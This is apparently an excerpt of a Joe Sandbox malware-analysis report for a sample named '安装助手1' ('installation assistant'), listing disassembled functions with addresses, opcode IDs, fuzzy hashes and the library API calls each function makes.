                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                              • Instruction ID: 1307d63af52ed5149292fe84c77f154cdbebf7a6e9656de11d78217dae58ee20
                              • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                              • Instruction Fuzzy Hash: C7C1E635208B418BC718CF39D1A42A7BBE2EFDA314F148A6DC4CA4BB56DA71A40DCF55
                              Function 6C39E4D0 Relevance: .3, Instructions: 307COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                              • Instruction ID: 41ca9280c4af57f07a39dc516420ec629d03f12bd6f98ac797e37bb7628c2bf0
                              • Opcode Fuzzy Hash: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                              • Instruction Fuzzy Hash: 64B16D72A053508FC380DF29C884255BBA2FF8526DB79969EC4948F646E337E847CF91
                              Function 6C3B4870 Relevance: .3, Instructions: 298COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                              • Instruction ID: 1c5611783f4577435b8824992e6a8a0d8f40829fb5357d902530f10818b1a078
                              • Opcode Fuzzy Hash: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                              • Instruction Fuzzy Hash: BAD1F8B1848B9A5FD394EF4DEC81A357762AF88301F4A8239DB6007753D634BB12D794
                              Function 6C38E810 Relevance: .3, Instructions: 296COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 198e3b67c30e49fc889c46f171b82045d2b176faab8633eba47bfa451d0a0751
                              • Instruction ID: 96ea8c098eb83df000943f5c41948313c759398684d65e4d9515f35b843f77ce
                              • Opcode Fuzzy Hash: 198e3b67c30e49fc889c46f171b82045d2b176faab8633eba47bfa451d0a0751
                              • Instruction Fuzzy Hash: B2B1F23530AB054BD324DF79C890BEAB3E1AF85708F04452DC9DA87781DF39A50A8F96
                              Function 6C3945D0 Relevance: .2, Instructions: 224COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                              • Instruction ID: 1863dc984e9b6f0fcb73a2253a1a51202b21c599d475621b54d6839dd7c71ddf
                              • Opcode Fuzzy Hash: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                              • Instruction Fuzzy Hash: 576110B27082158FD30CCFA9E580A96B3E5EB99321B1686BFD115CB361E771DC45CB18
                              Function 6C3A8520 Relevance: .2, Instructions: 216COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                              • Instruction ID: 65ad39211c6d57a4ab640076c732f5a49d352e93dbe4f0509b48fad3dd64e61c
                              • Opcode Fuzzy Hash: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                              • Instruction Fuzzy Hash: B1918F72C1871A8BD314CF58D88025AB7E0FB88318F49067DED99A7341D73AEA55CBC6
                              Function 6C330B66 Relevance: .2, Instructions: 167COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                              • Instruction ID: 6662935a775d8777e825efe7e3b412d9ff0b2064df0fc16c22bc38f117bcc6c1
                              • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                              • Instruction Fuzzy Hash: 7A51CE72F006599BDB08CE98DD916EDBBF2EB88308F249069D019EB781D7749A41CF50
                              Function 6C332EC9 Relevance: .1, Instructions: 136COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                              • Instruction ID: c5842ade35c699cf5afb509c87de371ed7ffa8c0f470ce7b5958a9889bdee843
                              • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                              • Instruction Fuzzy Hash: 2B3114277A445107C70CC92BCD1679F91535BD422A70EDB396809DAFA6D52EC8124584
                              Function 6C39EEF0 Relevance: .1, Instructions: 123COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                              • Instruction ID: bdcbcd9351660d2d42dd2532f53706930edd5ab4c166e8075ad2f4452cd75406
                              • Opcode Fuzzy Hash: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                              • Instruction Fuzzy Hash: EB31E773514B064BF301852989443967227FBC636CF2A8766E96787BECFA729806C981
                              Function 6C3A6820 Relevance: .1, Instructions: 112COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                              • Instruction ID: a1796defc2930e5bbb52ecc7c0278740c34a8a629c4f4275fe408d86402a14ae
                              • Opcode Fuzzy Hash: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                              • Instruction Fuzzy Hash: 4E41A1B29047068FD704CF19C89056AB3F8FF88318F454A2DE95AA7381E331EA25CF91
                              Function 6C3B46C0 Relevance: .1, Instructions: 88COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                              • Instruction ID: 9ad327cecfbae06ee6d807a6e7bfa0623da2e4bdfae44e0d0817cb07f8fbfe5e
                              • Opcode Fuzzy Hash: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                              • Instruction Fuzzy Hash: 212148B1A047E707E7209E6DCCD037577D29BC2305F094279DAB08FA87D17A84A2DA64
                              Function 6C3A67A0 Relevance: .0, Instructions: 41COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                              • Instruction ID: cb723b3fc7dc1ace6ae0df842d4e0cd36431fb0aae7a2ecdea756e9b0c4bb62d
                              • Opcode Fuzzy Hash: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                              • Instruction Fuzzy Hash: F601D17292462E57DB189F48CC41132B390FB84312F49823ADD479B385E735F870C6C0
                              Function 6C2F9D35 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                              • Instruction ID: bbe381b6f08eecb551a6fed07b46fcebfd820872d77ed2b8bf40aba20f6cc6ec
                              • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                              • Instruction Fuzzy Hash: 14E08C72A5223CEBCB25FF88C940D8AF3ECEB45A05B210096B921D3610D270DE01CBE0
                              Function 6C34EB50 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 341COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                              • API String ID: 3519838083-609671
                              • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                              • Instruction ID: e26f6fa1c38595338be54054cef1d119d22583a6eb6d8355fbdd80603b931767
                              • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                              • Instruction Fuzzy Hash: F6D17D71A0430A9FCB15CFA4D990AEEB7F5FF49308F248519E095A3A50DB71A948CFA1
                              Function 6C336798 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 461COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __aulldiv$H_prolog
                              • String ID: >WJ$x$x
                              • API String ID: 2300968129-3162267903
                              • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                              • Instruction ID: ec74c7db8b13a21f89674b95d4bacb01fc2da8acb8e3e3b24608b82a1a975442
                              • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                              • Instruction Fuzzy Hash: 0F129A719002A9EFCF14DFA4C880AEDBBB5FF48318F209169E859EBA50C7369945CF51
                              Function 6C2E9AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                              Download Yara Rule
                              APIs
                              • _ValidateLocalCookies.LIBCMT ref: 6C2E9B07
                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6C2E9B0F
                              • _ValidateLocalCookies.LIBCMT ref: 6C2E9B98
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6C2E9BC3
                              • _ValidateLocalCookies.LIBCMT ref: 6C2E9C18
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                              • String ID: csm
                              • API String ID: 1170836740-1018135373
                              • Opcode ID: 6bdd9f660510de344a2eedfeada6bbb22ace9a9d4c5bcc9ca4b1bfff1a76b284
                              • Instruction ID: b166388873bbd9a55b02600b06f62a566bd95fb7def52606abe1fdd234727178
                              • Opcode Fuzzy Hash: 6bdd9f660510de344a2eedfeada6bbb22ace9a9d4c5bcc9ca4b1bfff1a76b284
                              • Instruction Fuzzy Hash: 6F41A530A1021D9FCF00FF68C840ADEBBB5AF49318F54815AEC25AB791D771DA15CB91
                              Function 6C2F6E9A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: api-ms-$ext-ms-
                              • API String ID: 0-537541572
                              • Opcode ID: 5dbc27f880a7858317df482651db23013b43e595d8f9e4e862f216647bc5dca6
                              • Instruction ID: d4a0e330a4bc2267d46dfbc7694853d5f567444ae2fc2a43ea1e726a0dd59047
                              • Opcode Fuzzy Hash: 5dbc27f880a7858317df482651db23013b43e595d8f9e4e862f216647bc5dca6
                              • Instruction Fuzzy Hash: 4921CC32A9521EBBEB114729CDC1E0AB668EB06769B150751FC36E7E80D730DD0286E0
                              Function 6C2FBEB1 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • GetConsoleCP.KERNEL32(?,6C2FB0D0,?), ref: 6C2FBEF9
                              • __fassign.LIBCMT ref: 6C2FC0D8
                              • __fassign.LIBCMT ref: 6C2FC0F5
                              • WriteFile.KERNEL32(?,6C305AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C2FC13D
                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C2FC17D
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C2FC229
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileWrite__fassign$ConsoleErrorLast
                              • String ID:
                              • API String ID: 4031098158-0
                              • Opcode ID: 0f86ff50524d22ab7f69b88b0934380353b419ceec85772f7a47c223be32ea7e
                              • Instruction ID: b3c6f5fba4dfdfbaaba7c62893456c0cc7c1cefa04bbb420ff9b0ca0689e73b5
                              • Opcode Fuzzy Hash: 0f86ff50524d22ab7f69b88b0934380353b419ceec85772f7a47c223be32ea7e
                              • Instruction Fuzzy Hash: 0BD19875E4124D9FDF21DFA8C8809EDFBB5BF49318F28016AE865BB241D731A906CB50
                              Function 6C1B2F60 Relevance: 9.1, APIs: 6, Instructions: 107COMMON
                              Download Yara Rule
                              APIs
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C1B2F95
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C1B2FAF
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C1B2FD0
                              • __Getctype.LIBCPMT ref: 6C1B3084
                              • std::_Facet_Register.LIBCPMT ref: 6C1B309C
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C1B30B7
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                              • String ID:
                              • API String ID: 1102183713-0
                              • Opcode ID: 86452996cefdb7800b2280c71599e04e24573301199ae2e27f1cb86eeebbdd72
                              • Instruction ID: 876488001967ee90b78b2f627c62c0f0e62c3541edee008969b09e5290fc9747
                              • Opcode Fuzzy Hash: 86452996cefdb7800b2280c71599e04e24573301199ae2e27f1cb86eeebbdd72
                              • Instruction Fuzzy Hash: 644153B2E002188FCB24CF85C854B9AB7B4FF58714F454129D869BBB80EB34A909CF90
                              Function 6C324FA6 Relevance: 9.1, APIs: 6, Instructions: 95COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __aulldiv$__aullrem
                              • String ID:
                              • API String ID: 2022606265-0
                              • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                              • Instruction ID: 4b297a37ea5f2be0a641bb9044cbb3e584e79da08c405037ef21679ae2b67bcd
                              • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                              • Instruction Fuzzy Hash: CB219171901219BBDF208E95CC40DDFBA69EF527A8F20C226B52475AD4D2768E50CFB2
                              Function 6C32A6EC Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 183COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C32A6F1
                                • Part of subcall function 6C339173: __EH_prolog.LIBCMT ref: 6C339178
                              • __EH_prolog.LIBCMT ref: 6C32A8F9
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: IJ$WIJ$J
                              • API String ID: 3519838083-740443243
                              • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                              • Instruction ID: 7f7674dfb9b42db05ae66d59714917600fb66ea154e7a65f51e65172fcf7d933
                              • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                              • Instruction Fuzzy Hash: F1719E31904255DFDF18DFA4C440BEDB7B0BF14308F1084A9D895ABB91CB79AA0ACF92
                              Function 6C305A0D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132fileCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • _free.LIBCMT ref: 6C305ADD
                              • _free.LIBCMT ref: 6C305B06
                              • SetEndOfFile.KERNEL32(00000000,6C3046EC,00000000,6C2FB0D0,?,?,?,?,?,?,?,6C3046EC,6C2FB0D0,00000000), ref: 6C305B38
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C3046EC,6C2FB0D0,00000000,?,?,?,?,00000000,?), ref: 6C305B54
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _free$ErrorFileLast
                              • String ID: 8Q
                              • API String ID: 1547350101-4022487301
                              • Opcode ID: 7d96aa65850494d770c08c45665ce4d7f86681573fea2e9d5e36e1a5e115d67f
                              • Instruction ID: 9af20e0f4e565ec196727c2b59aa6a5b950f35297b562001192a6674b49f62bc
                              • Opcode Fuzzy Hash: 7d96aa65850494d770c08c45665ce4d7f86681573fea2e9d5e36e1a5e115d67f
